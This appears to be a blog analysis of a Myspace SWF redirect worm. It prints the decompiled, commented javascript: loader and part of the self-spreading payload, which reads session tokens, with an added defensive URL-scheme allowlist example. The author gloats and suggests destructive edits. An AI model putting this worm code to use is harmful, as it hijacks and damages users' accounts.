Myspace SWF redirect exploit worm
SWEET! Everyone on Myspace is a tool. Always were and will be moreso in the future. I am NOT apologizing for that. NO. Myspace was actually started by spammers as a way to easily data mine. Anyway, that is not what I am going to talk about. Myspace just got hit by a nifty little .SWF flash redirect exploit worm. **Note. I didn't make it. "darn"**
Props to Kinematic for Digging this (digg.com)
For those of you not "in" to reading code, I will explain what this basically means. When you are signed in to Myspace and go to an infected profile, it infects your profile and sends you to a site with conspiracy theories about how Bush knew about 9/11. (not that they aren't true)
Fixing this is going to be almost impossible except by blocking all flash content. It will be interesting to see how they deal with this. This is only the first of many, many, Myspace exploits. Just because of how it operates using URLs it is so easy to do things to people. You could edit this code so that everyone who saw your profile would add you as a friend, or completely delete their profile... the possibilities are endless! (for other people, that is. heh, heh)
How the myspace SWF hack worked
First note: I DID NOT MAKE THE HACK. I simply downloaded the .swf's, decompiled them, looked at the actionscript, worked out what it did, found the Javascript that it uses, and tidied it up & commented it. I've probably got some bits wrong, feel free to contact me and I'll update this page.
When you visited an already infected page, there was an SWF embedded ("redirect.swf") which contained the actionscript:
getURL("http://editprofile.myspace.com/index.cfm?fuseaction=blog.view&friendID=93634373&blogID=144877075", "_self");
Which is pretty self explanatory - it opened the blog URL which you got redirected to.
On the blog url which you got redirected to, there was another SWF embedded, called "retrievecookie.swf". This contained:
getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\'
\')!=-1)||(sc.indexOf(\'-XXX\')!=-1)){var n=sc.indexOf(\'
\');if(n==-1)n=sc.indexOf(\'-XXX\');sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};" + "eval(sc);}};" + "x.send(null);", "");
Which looks pretty obfuscated, however, when you space it out and add comments:
getURL("
javas\n\r
cript:
//this translates in the browser to: "javascript:"
//which myspace really should have blocked now.
var x = new ActiveXObject(\'Msxml2.XMLHTTP\');
// loads a new xmlHTTP object, sets it as var "x"
x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);
// This opens yet another blog post, at the URL above. The text of the URL is below
x.onreadystatechange = function()
// when the readystate of the xmlHTTP object changes:
{
if (x.readyState==4)
// once the state changes to complete (it goes from 0 to 4, iirc)
{
var pg = x.responseText;
// the code it got from the page
var sc = pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));
// loads into "sc" the contents of the response text from the place where
// the end of "BX-" (that's the +3) is first encountered up until it finds the start of
// "-EX", this is all the nasty JS.
while ( (sc.indexOf(\'
\')!=-1) || (sc.indexOf(\'-XXX\')!=-1) )
// while "sc" (the code) still contains "
" or "-XXX" then:
{
var n=sc.indexOf(\'
\');
// n is the start of where it finds "
" in "sc"
if (n==-1)
n=sc.indexOf(\'-XXX\');
// if it can't find "
, then make n where it can find "-XXX"
// this bit next was really quite clever, it manages to keep the > closing bracket for
// the embed tag, which it needs, and creates the embed tag by removing
// XXX's and leaving the final character!
sc = sc.substring(0,n)+sc.substring(n+5,sc.length);
// sc is now from the start, to n.
// then add on to sc the bit from n+5 to the end of sc,
// essentially, this cuts out the crap from the blog post it pulled.
// the crap was in there in the first place to get past myspace's filters, I presume.
};
// this iterates through and removes the -XXX's from the blog post
" + "eval(sc);
// evaluate "sc" - this is what does it all.
} // end of readystate==4 "if"
}; //end of function
" //closing the quote from the SWF getURL() function
+
"
x.send(null);
// adds on sending "null" to the xmlHTTP object.
", ""
// no target, so it just executes.
);// end of SWF getURL function.
In essence, it pulls a blog post from somewhere else on myspace, and evaluates the code that it contains.
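The `javas\n\rcript:` prefix in the loader above is read by the browser as `javascript:`, so a filter that looks for the literal string misses it. As an added example (not part of the original write-up and not Myspace's code), here is a scheme check that normalizes a URL the way browsers do and then applies an allowlist; the function names, the allowlist contents and the sample strings are assumptions constructed for illustration.

```javascript
// Naive blacklist: matches the literal prefix only.
function naiveIsScriptUrl(url) {
  return url.toLowerCase().startsWith("javascript:");
}

// Schemes a profile page is assumed to need (assumption, adjust per site).
const ALLOWED_SCHEMES = new Set(["http", "https"]);

// Mirror browser URL preprocessing: strip leading/trailing C0 control
// characters and spaces, then remove every tab, LF and CR in the string.
function normalizeUrl(url) {
  return url
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

// Lower-cased scheme of the normalized URL, or null if it has none.
function schemeOf(url) {
  const m = /^([a-zA-Z][a-zA-Z0-9+.\-]*):/.exec(normalizeUrl(url));
  return m ? m[1].toLowerCase() : null;
}

// Allowlist decision: only absolute URLs with a listed scheme pass.
// Relative URLs are rejected too, so callers must resolve them first.
function isAllowedUrl(url) {
  const scheme = schemeOf(url);
  return scheme !== null && ALLOWED_SCHEMES.has(scheme);
}

// Constructed samples; the script bodies are harmless stubs.
const SAMPLES = [
  "javascript:void(0)",
  "javas\n\rcript: var x = 1;", // same prefix trick as the loader
  " \tJaVaScRiPt:void(0)",
  "http://editprofile.myspace.com/index.cfm?fuseaction=blog.view",
];

// Compare both filters over a list of URLs.
function audit(urls) {
  return urls.map((u) => ({
    url: JSON.stringify(u),
    naiveFlagged: naiveIsScriptUrl(u),
    scheme: schemeOf(u),
    allowed: isAllowedUrl(u),
  }));
}

console.table(audit(SAMPLES));
```

The naive check flags only the first sample, while the allowlist rejects all three script URLs and passes the `http` one.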
This is the post:
BX-var msg='-XXXX<-XXX XE-XXXXM-XXXXB-XXXXE-XXXXD-XXXX src="http://i105.photobucket.com/albums/m225/yrkblack/redirect.swf">BY SPAIRLKAIFS';function paramsToString(AV){ var N=new String(); var O=0; for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){ Q=Q.replace('+', '%2B')}while(Q.indexOf('&')!=-1){ Q=Q.replace('&', '%26')}N+=P+'='+Q;O++ } return N};function getToken(page){ var start = page.indexOf('Mytoken='); token = page.substring(start+8, start+8+36); return token;};function getHashCode(page){ var start = page.indexOf